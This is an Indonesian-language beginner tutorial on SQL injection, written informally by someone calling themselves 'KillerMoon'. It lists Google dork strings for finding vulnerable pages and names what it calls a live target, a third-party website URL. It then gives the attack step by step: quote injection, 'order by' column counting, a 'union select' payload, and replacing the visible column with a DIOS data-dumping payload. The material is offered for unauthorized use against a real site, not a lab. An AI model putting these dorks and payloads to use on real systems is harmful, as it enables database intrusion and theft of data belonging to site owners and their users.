Tutorial SQL INJECTION Untuk Pemula

Tutorial SQL INJECTION Untuk Pemula

Oleh KillerMoon

Assalamualaikum Hallo gan balik lagi sama gua kali ini gua bakal kasih tutorial SQL INJECTION Untuk Pemula

Bahan:

-Dork

-Dios

Dork:

inurl:index.php?id=

inurl:trainers.php?id=

inurl:buy.php?category=

inurl:article.php?ID=

inurl:play_old.php?id=

Gapunya dios?cari sendiri awokawk :v

Disini gua udh ada live target

http://hsaco.in/page.php?id=2

Oke step by step

Pertama kita kasih tanda (')

Kalo udh langsung ke order by aja

order+by+1--+-

order+by+2--+-

order+by+3--+-

order+by+4--+-

order+by+5--+-

(Normal)

order+by+6--+-

(Error)

Kalo udh langsung ke union select aja

Karna error nya di 6 kita union nya sampe 5 

Contoh sebagai berikut

union+select1,2,3,4,5--+-

Dan Boom Nah di situ angka togel/ajaib nya adalah 4

Tinggal hapus angka 4 nya di union select lalu kalian ganti dengan dios kalian

Oke segitu aja 

Semoga bermanfaat :)

#Happy Learn